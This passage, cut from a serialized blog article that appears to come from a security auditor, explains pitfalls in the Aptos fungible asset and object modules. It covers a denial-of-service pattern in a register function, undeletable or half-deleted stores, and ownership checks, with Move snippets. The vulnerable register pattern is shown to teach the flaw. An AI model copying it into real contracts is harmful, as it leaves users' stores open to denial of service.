\"secondary\" fungible stores by themselves.",{"type":24,"tag":32,"props":69332,"children":69333},{},[69334],{"type":30,"value":69335},"One key feature of the primary fungible stores is their permissionless creation. This can lead to surprising denial of service bugs!",{"type":24,"tag":291,"props":69337,"children":69339},{"className":9818,"code":69338,"language":9817,"meta":7,"style":7},"public entry fun register(\n user: &signer, [...]\n) acquires [...] {\n [...]\n let wallet_store = create_primary_store(signer::address_of(sender), get_metadata());\n [...]\n}\n",[69340],{"type":24,"tag":145,"props":69341,"children":69342},{"__ignoreMap":7},[69343,69368,69400,69423,69439,69493,69508],{"type":24,"tag":301,"props":69344,"children":69345},{"class":303,"line":304},[69346,69350,69355,69359,69364],{"type":24,"tag":301,"props":69347,"children":69348},{"style":369},[69349],{"type":30,"value":68388},{"type":24,"tag":301,"props":69351,"children":69352},{"style":369},[69353],{"type":30,"value":69354}," entry",{"type":24,"tag":301,"props":69356,"children":69357},{"style":369},[69358],{"type":30,"value":13026},{"type":24,"tag":301,"props":69360,"children":69361},{"style":314},[69362],{"type":30,"value":69363}," register",{"type":24,"tag":301,"props":69365,"children":69366},{"style":359},[69367],{"type":30,"value":1707},{"type":24,"tag":301,"props":69369,"children":69370},{"class":303,"line":320},[69371,69376,69380,69384,69388,69392,69396],{"type":24,"tag":301,"props":69372,"children":69373},{"style":369},[69374],{"type":30,"value":69375}," user",{"type":24,"tag":301,"props":69377,"children":69378},{"style":385},[69379],{"type":30,"value":1679},{"type":24,"tag":301,"props":69381,"children":69382},{"style":385},[69383],{"type":30,"value":991},{"type":24,"tag":301,"props":69385,"children":69386},{"style":369},[69387],{"type":30,"value":13963},{"type":24,"tag":301,"props":69389,"children":69390},{"style":359},[69391],{"type":30,"value":50872},{"type":24,"tag":301,"props":69393,"children":69394},{"style":385},[69395],{"type":30,"value":4054},{"type":24,"tag":301,"props":69397,"children":69398},{"style":359},[69399],{"type":30,"value":4059},{"type":24,"tag":301,"props":69401,"children":69402},{"class":303,"line":335},[69403,69407,69411,69415,69419],{"type":24,"tag":301,"props":69404,"children":69405},{"style":359},[69406],{"type":30,"value":911},{"type":24,"tag":301,"props":69408,"children":69409},{"style":369},[69410],{"type":30,"value":13163},{"type":24,"tag":301,"props":69412,"children":69413},{"style":359},[69414],{"type":30,"value":29800},{"type":24,"tag":301,"props":69416,"children":69417},{"style":385},[69418],{"type":30,"value":4054},{"type":24,"tag":301,"props":69420,"children":69421},{"style":359},[69422],{"type":30,"value":68479},{"type":24,"tag":301,"props":69424,"children":69425},{"class":303,"line":344},[69426,69431,69435],{"type":24,"tag":301,"props":69427,"children":69428},{"style":359},[69429],{"type":30,"value":69430}," [",{"type":24,"tag":301,"props":69432,"children":69433},{"style":385},[69434],{"type":30,"value":4054},{"type":24,"tag":301,"props":69436,"children":69437},{"style":359},[69438],{"type":30,"value":4059},{"type":24,"tag":301,"props":69440,"children":69441},{"class":303,"line":401},[69442,69446,69451,69455,69460,69464,69468,69472,69476,69480,69484,69489],{"type":24,"tag":301,"props":69443,"children":69444},{"style":348},[69445],{"type":30,"value":9838},{"type":24,"tag":301,"props":69447,"children":69448},{"style":369},[69449],{"type":30,"value":69450}," wallet_store",{"type":24,"tag":301,"props":69452,"children":69453},{"style":385},[69454],{"type":30,"value":2537},{"type":24,"tag":301,"props":69456,"children":69457},{"style":314},[69458],{"type":30,"value":69459}," create_primary_store",{"type":24,"tag":301,"props":69461,"children":69462},{"style":359},[69463],{"type":30,"value":14017},{"type":24,"tag":301,"props":69465,"children":69466},{"style":385},[69467],{"type":30,"value":10308},{"type":24,"tag":301,"props":69469,"children":69470},{"style":314},[69471],{"type":30,"value":14026},{"type":24,"tag":301,"props":69473,"children":69474},{"style":359},[69475],{"type":30,"value":362},{"type":24,"tag":301,"props":69477,"children":69478},{"style":369},[69479],{"type":30,"value":68573},{"type":24,"tag":301,"props":69481,"children":69482},{"style":359},[69483],{"type":30,"value":21967},{"type":24,"tag":301,"props":69485,"children":69486},{"style":314},[69487],{"type":30,"value":69488},"get_metadata",{"type":24,"tag":301,"props":69490,"children":69491},{"style":359},[69492],{"type":30,"value":22214},{"type":24,"tag":301,"props":69494,"children":69495},{"class":303,"line":415},[69496,69500,69504],{"type":24,"tag":301,"props":69497,"children":69498},{"style":359},[69499],{"type":30,"value":69430},{"type":24,"tag":301,"props":69501,"children":69502},{"style":385},[69503],{"type":30,"value":4054},{"type":24,"tag":301,"props":69505,"children":69506},{"style":359},[69507],{"type":30,"value":4059},{"type":24,"tag":301,"props":69509,"children":69510},{"class":303,"line":439},[69511],{"type":24,"tag":301,"props":69512,"children":69513},{"style":359},[69514],{"type":30,"value":698},{"type":24,"tag":32,"props":69516,"children":69517},{},[69518,69519,69525,69527,69533],{"type":30,"value":8079},{"type":24,"tag":145,"props":69520,"children":69522},{"className":69521},[],[69523],{"type":30,"value":69524},"create_primary_store",{"type":30,"value":69526}," function can introduce DoS vulnerabilities because it aborts if the store already exists. Using ",{"type":24,"tag":145,"props":69528,"children":69530},{"className":69529},[],[69531],{"type":30,"value":69532},"ensure_primary_store_exists",{"type":30,"value":69534}," is recommended to avoid such issues.",{"type":24,"tag":43,"props":69536,"children":69538},{"id":69537},"fungible-assets-and-objects",[69539],{"type":30,"value":69540},"Fungible assets and objects",{"type":24,"tag":32,"props":69542,"children":69543},{},[69544,69546,69551,69553,69560],{"type":30,"value":69545},"The fungible asset standard is not a standalone module. It has heavy dependencies on a sibling module, the ",{"type":24,"tag":145,"props":69547,"children":69549},{"className":69548},[],[69550],{"type":30,"value":55585},{"type":30,"value":69552}," module, introduced in ",{"type":24,"tag":188,"props":69554,"children":69557},{"href":69555,"rel":69556},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-10.md",[192],[69558],{"type":30,"value":69559},"AIP-10",{"type":30,"value":206},{"type":24,"tag":9770,"props":69562,"children":69563},{},[69564],{"type":24,"tag":32,"props":69565,"children":69566},{},[69567,69571],{"type":24,"tag":301,"props":69568,"children":69569},{},[69570],{"type":30,"value":68163},{"type":30,"value":69572}," proposes a standard for Fungible Assets (FA) using Move Objects. In this model, any on-chain asset represented as an object can also be expressed as a fungible asset allowing for a single object to be represented by many distinct, yet interchangeable units of ownership.",{"type":24,"tag":32,"props":69574,"children":69575},{},[69576],{"type":30,"value":69577},"These two modules are closely intertwined, and their connection can be surprisingly intricate.",{"type":24,"tag":80,"props":69579,"children":69581},{"id":69580},"creation-and-deletion",[69582],{"type":30,"value":69583},"Creation and deletion",{"type":24,"tag":32,"props":69585,"children":69586},{},[69587,69589,69595],{"type":30,"value":69588},"To create a fungible resource, an undeletable object must first be created. \"Undeletable\" means, that it's not possible to get a permission to delete it. This is verified in ",{"type":24,"tag":145,"props":69590,"children":69592},{"className":69591},[],[69593],{"type":30,"value":69594},"fungible_asset::add_fungibility",{"type":30,"value":1679},{"type":24,"tag":291,"props":69597,"children":69599},{"className":9818,"code":69598,"language":9817,"meta":7,"style":7},"assert!(!object::can_generate_delete_ref(constructor_ref), error::invalid_argument(EOBJECT_IS_DELETABLE));\n",[69600],{"type":24,"tag":145,"props":69601,"children":69602},{"__ignoreMap":7},[69603],{"type":24,"tag":301,"props":69604,"children":69605},{"class":303,"line":304},[69606,69610,69614,69618,69623,69627,69632,69636,69641,69646,69650,69654],{"type":24,"tag":301,"props":69607,"children":69608},{"style":314},[69609],{"type":30,"value":48720},{"type":24,"tag":301,"props":69611,"children":69612},{"style":359},[69613],{"type":30,"value":362},{"type":24,"tag":301,"props":69615,"children":69616},{"style":385},[69617],{"type":30,"value":2485},{"type":24,"tag":301,"props":69619,"children":69620},{"style":359},[69621],{"type":30,"value":69622},"object",{"type":24,"tag":301,"props":69624,"children":69625},{"style":385},[69626],{"type":30,"value":10308},{"type":24,"tag":301,"props":69628,"children":69629},{"style":314},[69630],{"type":30,"value":69631},"can_generate_delete_ref",{"type":24,"tag":301,"props":69633,"children":69634},{"style":359},[69635],{"type":30,"value":362},{"type":24,"tag":301,"props":69637,"children":69638},{"style":369},[69639],{"type":30,"value":69640},"constructor_ref",{"type":24,"tag":301,"props":69642,"children":69643},{"style":359},[69644],{"type":30,"value":69645},"), error",{"type":24,"tag":301,"props":69647,"children":69648},{"style":385},[69649],{"type":30,"value":10308},{"type":24,"tag":301,"props":69651,"children":69652},{"style":314},[69653],{"type":30,"value":69086},{"type":24,"tag":301,"props":69655,"children":69656},{"style":359},[69657],{"type":30,"value":69658},"(EOBJECT_IS_DELETABLE));\n",{"type":24,"tag":32,"props":69660,"children":69661},{},[69662,69664,69669,69671,69676,69677,69684],{"type":30,"value":69663},"This object serves as the foundation for ownership tokens in the form of a ",{"type":24,"tag":145,"props":69665,"children":69667},{"className":69666},[],[69668],{"type":30,"value":68224},{"type":30,"value":69670},". This means that allowing it to be deletable wouldn't make sense and would impact the usability of such fungible assets, restricting users from accessing critical functionalities such as creating new stores. In the past the ",{"type":24,"tag":145,"props":69672,"children":69674},{"className":69673},[],[69675],{"type":30,"value":69594},{"type":30,"value":13277},{"type":24,"tag":188,"props":69678,"children":69681},{"href":69679,"rel":69680},"https://github.com/aptos-labs/aptos-core/commit/6976f8e9004b0f6ebb6fd976410d695c5a5a7ace",[192],[69682],{"type":30,"value":69683},"lacked this assert",{"type":30,"value":69685},", which we discovered and reported.",{"type":24,"tag":32,"props":69687,"children":69688},{},[69689,69694,69696,69701,69703,69708],{"type":24,"tag":145,"props":69690,"children":69692},{"className":69691},[],[69693],{"type":30,"value":69594},{"type":30,"value":69695}," transfers the ",{"type":24,"tag":145,"props":69697,"children":69699},{"className":69698},[],[69700],{"type":30,"value":68283},{"type":30,"value":69702}," and associated resources to this new object. After that, with the appropriate permissions, the ",{"type":24,"tag":145,"props":69704,"children":69706},{"className":69705},[],[69707],{"type":30,"value":68224},{"type":30,"value":69709}," can be minted, representing a share of ownership in that object.",{"type":24,"tag":291,"props":69711,"children":69713},{"className":9818,"code":69712,"language":9817,"meta":7,"style":7},"/// Make an existing object fungible by adding the Metadata resource.\npublic fun add_fungibility(\n [...]\n): Object\u003CMetadata> {\n [...]\n move_to(metadata_object_signer,\n Metadata {\n name,\n symbol,\n decimals,\n icon_uri,\n project_uri,\n }\n );\n[...]\n}\n",[69714],{"type":24,"tag":145,"props":69715,"children":69716},{"__ignoreMap":7},[69717,69725,69745,69760,69787,69802,69823,69835,69847,69859,69871,69883,69895,69902,69909,69924],{"type":24,"tag":301,"props":69718,"children":69719},{"class":303,"line":304},[69720],{"type":24,"tag":301,"props":69721,"children":69722},{"style":1062},[69723],{"type":30,"value":69724},"/// Make an existing object fungible by adding the Metadata resource.\n",{"type":24,"tag":301,"props":69726,"children":69727},{"class":303,"line":320},[69728,69732,69736,69741],{"type":24,"tag":301,"props":69729,"children":69730},{"style":369},[69731],{"type":30,"value":68388},{"type":24,"tag":301,"props":69733,"children":69734},{"style":369},[69735],{"type":30,"value":13026},{"type":24,"tag":301,"props":69737,"children":69738},{"style":314},[69739],{"type":30,"value":69740}," add_fungibility",{"type":24,"tag":301,"props":69742,"children":69743},{"style":359},[69744],{"type":30,"value":1707},{"type":24,"tag":301,"props":69746,"children":69747},{"class":303,"line":335},[69748,69752,69756],{"type":24,"tag":301,"props":69749,"children":69750},{"style":359},[69751],{"type":30,"value":69430},{"type":24,"tag":301,"props":69753,"children":69754},{"style":385},[69755],{"type":30,"value":4054},{"type":24,"tag":301,"props":69757,"children":69758},{"style":359},[69759],{"type":30,"value":4059},{"type":24,"tag":301,"props":69761,"children":69762},{"class":303,"line":344},[69763,69767,69771,69775,69779,69783],{"type":24,"tag":301,"props":69764,"children":69765},{"style":359},[69766],{"type":30,"value":9961},{"type":24,"tag":301,"props":69768,"children":69769},{"style":385},[69770],{"type":30,"value":1679},{"type":24,"tag":301,"props":69772,"children":69773},{"style":10246},[69774],{"type":30,"value":68274},{"type":24,"tag":301,"props":69776,"children":69777},{"style":359},[69778],{"type":30,"value":1849},{"type":24,"tag":301,"props":69780,"children":69781},{"style":10246},[69782],{"type":30,"value":68283},{"type":24,"tag":301,"props":69784,"children":69785},{"style":359},[69786],{"type":30,"value":14097},{"type":24,"tag":301,"props":69788,"children":69789},{"class":303,"line":401},[69790,69794,69798],{"type":24,"tag":301,"props":69791,"children":69792},{"style":359},[69793],{"type":30,"value":69430},{"type":24,"tag":301,"props":69795,"children":69796},{"style":385},[69797],{"type":30,"value":4054},{"type":24,"tag":301,"props":69799,"children":69800},{"style":359},[69801],{"type":30,"value":4059},{"type":24,"tag":301,"props":69803,"children":69804},{"class":303,"line":415},[69805,69810,69814,69819],{"type":24,"tag":301,"props":69806,"children":69807},{"style":314},[69808],{"type":30,"value":69809}," move_to",{"type":24,"tag":301,"props":69811,"children":69812},{"style":359},[69813],{"type":30,"value":362},{"type":24,"tag":301,"props":69815,"children":69816},{"style":369},[69817],{"type":30,"value":69818},"metadata_object_signer",{"type":24,"tag":301,"props":69820,"children":69821},{"style":359},[69822],{"type":30,"value":1729},{"type":24,"tag":301,"props":69824,"children":69825},{"class":303,"line":439},[69826,69831],{"type":24,"tag":301,"props":69827,"children":69828},{"style":10246},[69829],{"type":30,"value":69830}," Metadata",{"type":24,"tag":301,"props":69832,"children":69833},{"style":359},[69834],{"type":30,"value":3035},{"type":24,"tag":301,"props":69836,"children":69837},{"class":303,"line":447},[69838,69843],{"type":24,"tag":301,"props":69839,"children":69840},{"style":369},[69841],{"type":30,"value":69842}," name",{"type":24,"tag":301,"props":69844,"children":69845},{"style":359},[69846],{"type":30,"value":1729},{"type":24,"tag":301,"props":69848,"children":69849},{"class":303,"line":476},[69850,69855],{"type":24,"tag":301,"props":69851,"children":69852},{"style":369},[69853],{"type":30,"value":69854}," symbol",{"type":24,"tag":301,"props":69856,"children":69857},{"style":359},[69858],{"type":30,"value":1729},{"type":24,"tag":301,"props":69860,"children":69861},{"class":303,"line":495},[69862,69867],{"type":24,"tag":301,"props":69863,"children":69864},{"style":369},[69865],{"type":30,"value":69866}," decimals",{"type":24,"tag":301,"props":69868,"children":69869},{"style":359},[69870],{"type":30,"value":1729},{"type":24,"tag":301,"props":69872,"children":69873},{"class":303,"line":504},[69874,69879],{"type":24,"tag":301,"props":69875,"children":69876},{"style":369},[69877],{"type":30,"value":69878}," icon_uri",{"type":24,"tag":301,"props":69880,"children":69881},{"style":359},[69882],{"type":30,"value":1729},{"type":24,"tag":301,"props":69884,"children":69885},{"class":303,"line":512},[69886,69891],{"type":24,"tag":301,"props":69887,"children":69888},{"style":369},[69889],{"type":30,"value":69890}," project_uri",{"type":24,"tag":301,"props":69892,"children":69893},{"style":359},[69894],{"type":30,"value":1729},{"type":24,"tag":301,"props":69896,"children":69897},{"class":303,"line":592},[69898],{"type":24,"tag":301,"props":69899,"children":69900},{"style":359},[69901],{"type":30,"value":3345},{"type":24,"tag":301,"props":69903,"children":69904},{"class":303,"line":619},[69905],{"type":24,"tag":301,"props":69906,"children":69907},{"style":359},[69908],{"type":30,"value":3788},{"type":24,"tag":301,"props":69910,"children":69911},{"class":303,"line":635},[69912,69916,69920],{"type":24,"tag":301,"props":69913,"children":69914},{"style":359},[69915],{"type":30,"value":541},{"type":24,"tag":301,"props":69917,"children":69918},{"style":385},[69919],{"type":30,"value":4054},{"type":24,"tag":301,"props":69921,"children":69922},{"style":359},[69923],{"type":30,"value":4059},{"type":24,"tag":301,"props":69925,"children":69926},{"class":303,"line":643},[69927],{"type":24,"tag":301,"props":69928,"children":69929},{"style":359},[69930],{"type":30,"value":698},{"type":24,"tag":2719,"props":69932,"children":69933},{},[],{"type":24,"tag":32,"props":69935,"children":69936},{},[69937,69939,69944,69946,69951],{"type":30,"value":69938},"Deletions can be a big issue even when dealing with objects that are eligible for deletion. For example, a ",{"type":24,"tag":145,"props":69940,"children":69942},{"className":69941},[],[69943],{"type":30,"value":68788},{"type":30,"value":69945}," is also an object, and a \"secondary\" ",{"type":24,"tag":145,"props":69947,"children":69949},{"className":69948},[],[69950],{"type":30,"value":68788},{"type":30,"value":69952}," can be created as deletable if empty. The catch is that deletion can occur both at the fungible asset level and at the object level.",{"type":24,"tag":291,"props":69954,"children":69956},{"className":9818,"code":69955,"language":9817,"meta":7,"style":7},"//Fungible asset\npublic fun remove_store(delete_ref: &DeleteRef)\n\n//Object\npublic fun delete(ref: DeleteRef)\n",[69957],{"type":24,"tag":145,"props":69958,"children":69959},{"__ignoreMap":7},[69960,69968,70010,70017,70025],{"type":24,"tag":301,"props":69961,"children":69962},{"class":303,"line":304},[69963],{"type":24,"tag":301,"props":69964,"children":69965},{"style":1062},[69966],{"type":30,"value":69967},"//Fungible asset\n",{"type":24,"tag":301,"props":69969,"children":69970},{"class":303,"line":320},[69971,69975,69979,69984,69988,69993,69997,70001,70006],{"type":24,"tag":301,"props":69972,"children":69973},{"style":369},[69974],{"type":30,"value":68388},{"type":24,"tag":301,"props":69976,"children":69977},{"style":369},[69978],{"type":30,"value":13026},{"type":24,"tag":301,"props":69980,"children":69981},{"style":314},[69982],{"type":30,"value":69983}," remove_store",{"type":24,"tag":301,"props":69985,"children":69986},{"style":359},[69987],{"type":30,"value":362},{"type":24,"tag":301,"props":69989,"children":69990},{"style":369},[69991],{"type":30,"value":69992},"delete_ref",{"type":24,"tag":301,"props":69994,"children":69995},{"style":385},[69996],{"type":30,"value":1679},{"type":24,"tag":301,"props":69998,"children":69999},{"style":385},[70000],{"type":30,"value":991},{"type":24,"tag":301,"props":70002,"children":70003},{"style":10246},[70004],{"type":30,"value":70005},"DeleteRef",{"type":24,"tag":301,"props":70007,"children":70008},{"style":359},[70009],{"type":30,"value":791},{"type":24,"tag":301,"props":70011,"children":70012},{"class":303,"line":335},[70013],{"type":24,"tag":301,"props":70014,"children":70015},{"emptyLinePlaceholder":16},[70016],{"type":30,"value":341},{"type":24,"tag":301,"props":70018,"children":70019},{"class":303,"line":344},[70020],{"type":24,"tag":301,"props":70021,"children":70022},{"style":1062},[70023],{"type":30,"value":70024},"//Object\n",{"type":24,"tag":301,"props":70026,"children":70027},{"class":303,"line":401},[70028,70032,70036,70041,70045,70050,70054,70059],{"type":24,"tag":301,"props":70029,"children":70030},{"style":369},[70031],{"type":30,"value":68388},{"type":24,"tag":301,"props":70033,"children":70034},{"style":369},[70035],{"type":30,"value":13026},{"type":24,"tag":301,"props":70037,"children":70038},{"style":314},[70039],{"type":30,"value":70040}," delete",{"type":24,"tag":301,"props":70042,"children":70043},{"style":359},[70044],{"type":30,"value":362},{"type":24,"tag":301,"props":70046,"children":70047},{"style":348},[70048],{"type":30,"value":70049},"ref",{"type":24,"tag":301,"props":70051,"children":70052},{"style":385},[70053],{"type":30,"value":1679},{"type":24,"tag":301,"props":70055,"children":70056},{"style":10246},[70057],{"type":30,"value":70058}," DeleteRef",{"type":24,"tag":301,"props":70060,"children":70061},{"style":359},[70062],{"type":30,"value":791},{"type":24,"tag":32,"props":70064,"children":70065},{},[70066,70068,70074,70076,70081,70083,70088,70090,70095,70097,70103,70105,70111,70113,70118],{"type":30,"value":70067},"When ",{"type":24,"tag":145,"props":70069,"children":70071},{"className":70070},[],[70072],{"type":30,"value":70073},"object::delete",{"type":30,"value":70075}," removes the ",{"type":24,"tag":145,"props":70077,"children":70079},{"className":70078},[],[70080],{"type":30,"value":55585},{"type":30,"value":70082}," from a ",{"type":24,"tag":145,"props":70084,"children":70086},{"className":70085},[],[70087],{"type":30,"value":68788},{"type":30,"value":70089}," object, the ",{"type":24,"tag":145,"props":70091,"children":70093},{"className":70092},[],[70094],{"type":30,"value":68788},{"type":30,"value":70096}," resource becomes permanently undeletable. This is because ",{"type":24,"tag":145,"props":70098,"children":70100},{"className":70099},[],[70101],{"type":30,"value":70102},"remove_store",{"type":30,"value":70104}," can't create an ",{"type":24,"tag":145,"props":70106,"children":70108},{"className":70107},[],[70109],{"type":30,"value":70110},"Object\u003CFungibleStore>",{"type":30,"value":70112}," without an ",{"type":24,"tag":145,"props":70114,"children":70116},{"className":70115},[],[70117],{"type":30,"value":55585},{"type":30,"value":70119}," underneath, causing the operation to fail.",{"type":24,"tag":291,"props":70121,"children":70123},{"className":9818,"code":70122,"language":9817,"meta":7,"style":7},"public fun remove_store(delete_ref: &DeleteRef) acquires [...] {\n let store = &object::object_from_delete_ref\u003CFungibleStore>(delete_ref);\n [...]\n}\n",[70124],{"type":24,"tag":145,"props":70125,"children":70126},{"__ignoreMap":7},[70127,70182,70234,70249],{"type":24,"tag":301,"props":70128,"children":70129},{"class":303,"line":304},[70130,70134,70138,70142,70146,70150,70154,70158,70162,70166,70170,70174,70178],{"type":24,"tag":301,"props":70131,"children":70132},{"style":369},[70133],{"type":30,"value":68388},{"type":24,"tag":301,"props":70135,"children":70136},{"style":369},[70137],{"type":30,"value":13026},{"type":24,"tag":301,"props":70139,"children":70140},{"style":314},[70141],{"type":30,"value":69983},{"type":24,"tag":301,"props":70143,"children":70144},{"style":359},[70145],{"type":30,"value":362},{"type":24,"tag":301,"props":70147,"children":70148},{"style":369},[70149],{"type":30,"value":69992},{"type":24,"tag":301,"props":70151,"children":70152},{"style":385},[70153],{"type":30,"value":1679},{"type":24,"tag":301,"props":70155,"children":70156},{"style":385},[70157],{"type":30,"value":991},{"type":24,"tag":301,"props":70159,"children":70160},{"style":10246},[70161],{"type":30,"value":70005},{"type":24,"tag":301,"props":70163,"children":70164},{"style":359},[70165],{"type":30,"value":911},{"type":24,"tag":301,"props":70167,"children":70168},{"style":369},[70169],{"type":30,"value":13163},{"type":24,"tag":301,"props":70171,"children":70172},{"style":359},[70173],{"type":30,"value":29800},{"type":24,"tag":301,"props":70175,"children":70176},{"style":385},[70177],{"type":30,"value":4054},{"type":24,"tag":301,"props":70179,"children":70180},{"style":359},[70181],{"type":30,"value":68479},{"type":24,"tag":301,"props":70183,"children":70184},{"class":303,"line":320},[70185,70189,70193,70197,70201,70205,70209,70214,70218,70222,70226,70230],{"type":24,"tag":301,"props":70186,"children":70187},{"style":348},[70188],{"type":30,"value":9838},{"type":24,"tag":301,"props":70190,"children":70191},{"style":369},[70192],{"type":30,"value":12651},{"type":24,"tag":301,"props":70194,"children":70195},{"style":385},[70196],{"type":30,"value":2537},{"type":24,"tag":301,"props":70198,"children":70199},{"style":385},[70200],{"type":30,"value":991},{"type":24,"tag":301,"props":70202,"children":70203},{"style":359},[70204],{"type":30,"value":69622},{"type":24,"tag":301,"props":70206,"children":70207},{"style":385},[70208],{"type":30,"value":10308},{"type":24,"tag":301,"props":70210,"children":70211},{"style":369},[70212],{"type":30,"value":70213},"object_from_delete_ref",{"type":24,"tag":301,"props":70215,"children":70216},{"style":359},[70217],{"type":30,"value":1849},{"type":24,"tag":301,"props":70219,"children":70220},{"style":10246},[70221],{"type":30,"value":68788},{"type":24,"tag":301,"props":70223,"children":70224},{"style":359},[70225],{"type":30,"value":14426},{"type":24,"tag":301,"props":70227,"children":70228},{"style":369},[70229],{"type":30,"value":69992},{"type":24,"tag":301,"props":70231,"children":70232},{"style":359},[70233],{"type":30,"value":589},{"type":24,"tag":301,"props":70235,"children":70236},{"class":303,"line":335},[70237,70241,70245],{"type":24,"tag":301,"props":70238,"children":70239},{"style":359},[70240],{"type":30,"value":69430},{"type":24,"tag":301,"props":70242,"children":70243},{"style":385},[70244],{"type":30,"value":4054},{"type":24,"tag":301,"props":70246,"children":70247},{"style":359},[70248],{"type":30,"value":4059},{"type":24,"tag":301,"props":70250,"children":70251},{"class":303,"line":344},[70252],{"type":24,"tag":301,"props":70253,"children":70254},{"style":359},[70255],{"type":30,"value":698},{"type":24,"tag":32,"props":70257,"children":70258},{},[70259,70261,70266,70268,70274,70276,70281],{"type":30,"value":70260},"In addition, such \"deleted\" ",{"type":24,"tag":145,"props":70262,"children":70264},{"className":70263},[],[70265],{"type":30,"value":68788},{"type":30,"value":70267}," objects remain at least partially operable. For instance, ",{"type":24,"tag":145,"props":70269,"children":70271},{"className":70270},[],[70272],{"type":30,"value":70273},"fungible_asset::deposit",{"type":30,"value":70275}," does not check the ",{"type":24,"tag":145,"props":70277,"children":70279},{"className":70278},[],[70280],{"type":30,"value":55585},{"type":30,"value":70282}," existence.",{"type":24,"tag":80,"props":70284,"children":70286},{"id":70285},"ownership",[70287],{"type":30,"value":70288},"Ownership",{"type":24,"tag":32,"props":70290,"children":70291},{},[70292,70294,70299,70301,70307,70309,70314],{"type":30,"value":70293},"Each object has an owner. Fungible assets rely on the ",{"type":24,"tag":145,"props":70295,"children":70297},{"className":70296},[],[70298],{"type":30,"value":55585},{"type":30,"value":70300}," ownership model. For example, during a withdrawal operation, the signer is validated using ",{"type":24,"tag":145,"props":70302,"children":70304},{"className":70303},[],[70305],{"type":30,"value":70306},"object::owns",{"type":30,"value":70308}," to confirm ownership of the ",{"type":24,"tag":145,"props":70310,"children":70312},{"className":70311},[],[70313],{"type":30,"value":68788},{"type":30,"value":56907},{"type":24,"tag":291,"props":70316,"children":70318},{"className":9818,"code":70317,"language":9817,"meta":7,"style":7},"public(friend) fun withdraw_sanity_check\u003CT: key>(\n owner: &signer,\n store: Object\u003CT>,\n abort_on_dispatch: bool,\n) acquires FungibleStore, DispatchFunctionStore {\n assert!(object::owns(store, signer::address_of(owner)), error::permission_denied(ENOT_STORE_OWNER));\n [...]\n}\n",[70319],{"type":24,"tag":145,"props":70320,"children":70321},{"__ignoreMap":7},[70322,70370,70394,70421,70441,70469,70537,70552],{"type":24,"tag":301,"props":70323,"children":70324},{"class":303,"line":304},[70325,70329,70333,70337,70341,70345,70350,70354,70358,70362,70366],{"type":24,"tag":301,"props":70326,"children":70327},{"style":314},[70328],{"type":30,"value":68388},{"type":24,"tag":301,"props":70330,"children":70331},{"style":359},[70332],{"type":30,"value":362},{"type":24,"tag":301,"props":70334,"children":70335},{"style":369},[70336],{"type":30,"value":13916},{"type":24,"tag":301,"props":70338,"children":70339},{"style":359},[70340],{"type":30,"value":911},{"type":24,"tag":301,"props":70342,"children":70343},{"style":369},[70344],{"type":30,"value":13925},{"type":24,"tag":301,"props":70346,"children":70347},{"style":369},[70348],{"type":30,"value":70349}," withdraw_sanity_check",{"type":24,"tag":301,"props":70351,"children":70352},{"style":359},[70353],{"type":30,"value":1849},{"type":24,"tag":301,"props":70355,"children":70356},{"style":10246},[70357],{"type":30,"value":12807},{"type":24,"tag":301,"props":70359,"children":70360},{"style":385},[70361],{"type":30,"value":1679},{"type":24,"tag":301,"props":70363,"children":70364},{"style":369},[70365],{"type":30,"value":12751},{"type":24,"tag":301,"props":70367,"children":70368},{"style":359},[70369],{"type":30,"value":13407},{"type":24,"tag":301,"props":70371,"children":70372},{"class":303,"line":320},[70373,70378,70382,70386,70390],{"type":24,"tag":301,"props":70374,"children":70375},{"style":369},[70376],{"type":30,"value":70377}," owner",{"type":24,"tag":301,"props":70379,"children":70380},{"style":385},[70381],{"type":30,"value":1679},{"type":24,"tag":301,"props":70383,"children":70384},{"style":385},[70385],{"type":30,"value":991},{"type":24,"tag":301,"props":70387,"children":70388},{"style":369},[70389],{"type":30,"value":13963},{"type":24,"tag":301,"props":70391,"children":70392},{"style":359},[70393],{"type":30,"value":1729},{"type":24,"tag":301,"props":70395,"children":70396},{"class":303,"line":335},[70397,70401,70405,70409,70413,70417],{"type":24,"tag":301,"props":70398,"children":70399},{"style":369},[70400],{"type":30,"value":36170},{"type":24,"tag":301,"props":70402,"children":70403},{"style":385},[70404],{"type":30,"value":1679},{"type":24,"tag":301,"props":70406,"children":70407},{"style":10246},[70408],{"type":30,"value":68274},{"type":24,"tag":301,"props":70410,"children":70411},{"style":359},[70412],{"type":30,"value":1849},{"type":24,"tag":301,"props":70414,"children":70415},{"style":10246},[70416],{"type":30,"value":12807},{"type":24,"tag":301,"props":70418,"children":70419},{"style":359},[70420],{"type":30,"value":12957},{"type":24,"tag":301,"props":70422,"children":70423},{"class":303,"line":344},[70424,70429,70433,70437],{"type":24,"tag":301,"props":70425,"children":70426},{"style":369},[70427],{"type":30,"value":70428}," abort_on_dispatch",{"type":24,"tag":301,"props":70430,"children":70431},{"style":385},[70432],{"type":30,"value":1679},{"type":24,"tag":301,"props":70434,"children":70435},{"style":10246},[70436],{"type":30,"value":18848},{"type":24,"tag":301,"props":70438,"children":70439},{"style":359},[70440],{"type":30,"value":1729},{"type":24,"tag":301,"props":70442,"children":70443},{"class":303,"line":401},[70444,70448,70452,70456,70460,70465],{"type":24,"tag":301,"props":70445,"children":70446},{"style":359},[70447],{"type":30,"value":911},{"type":24,"tag":301,"props":70449,"children":70450},{"style":369},[70451],{"type":30,"value":13163},{"type":24,"tag":301,"props":70453,"children":70454},{"style":10246},[70455],{"type":30,"value":68808},{"type":24,"tag":301,"props":70457,"children":70458},{"style":359},[70459],{"type":30,"value":377},{"type":24,"tag":301,"props":70461,"children":70462},{"style":10246},[70463],{"type":30,"value":70464},"DispatchFunctionStore",{"type":24,"tag":301,"props":70466,"children":70467},{"style":359},[70468],{"type":30,"value":3035},{"type":24,"tag":301,"props":70470,"children":70471},{"class":303,"line":415},[70472,70476,70481,70485,70490,70494,70498,70502,70506,70510,70514,70518,70523,70527,70532],{"type":24,"tag":301,"props":70473,"children":70474},{"style":314},[70475],{"type":30,"value":69056},{"type":24,"tag":301,"props":70477,"children":70478},{"style":359},[70479],{"type":30,"value":70480},"(object",{"type":24,"tag":301,"props":70482,"children":70483},{"style":385},[70484],{"type":30,"value":10308},{"type":24,"tag":301,"props":70486,"children":70487},{"style":314},[70488],{"type":30,"value":70489},"owns",{"type":24,"tag":301,"props":70491,"children":70492},{"style":359},[70493],{"type":30,"value":362},{"type":24,"tag":301,"props":70495,"children":70496},{"style":369},[70497],{"type":30,"value":12760},{"type":24,"tag":301,"props":70499,"children":70500},{"style":359},[70501],{"type":30,"value":19731},{"type":24,"tag":301,"props":70